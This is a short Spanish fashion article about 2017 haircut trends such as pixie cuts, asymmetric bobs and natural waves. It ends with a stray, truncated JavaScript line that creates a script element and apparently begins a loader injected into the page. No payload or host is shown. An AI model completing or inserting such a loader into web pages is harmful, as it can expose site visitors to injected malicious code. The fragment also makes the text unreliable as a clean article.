Este año viene muy fuerte y con grandes cambios en el mundo de la moda. Los cortes de cabello son uno ellos, que buscarán un estilo nuevo y diferente a años pasados.
El 2017 es una gran ocasión para cambiar de corte de pelo y una de las tendencias que viene muy fuerte para esta nueva temporada es el pelo corto.
Se llevarán cortes mucho más radicales que años anteriores, con aires punk y rockeros, aunque también tienen su público los cortes cortos estilo más discretos y con movimiento.
Dentro de las tendencias podemos destacar los cortes modernos y, sobretodo, radicales. Los cortes pixie serán el must de la temporada. Se lleva corto desde la nuca y los laterales pueden terminar en punta. Puedes llevarlo con flequillo para verte más chic.
En este año seguiremos viendo que cortes tipo Bob, asimétrico y con la nuca descubierta y la parte delantera más alargada. Algunas expertos recomiendan rapar uno de los lados para lograr un estilo punk.
Olvídate de los cabellos lisos y planchados, la tendencia será en llevar melenas al natural con toques ondulados y afros. Para lograrlo seca el exceso de agua después del baño y aplica un spray fijador o crema para crear ese efecto.
var d=document;var s=d.createElement(‘script’);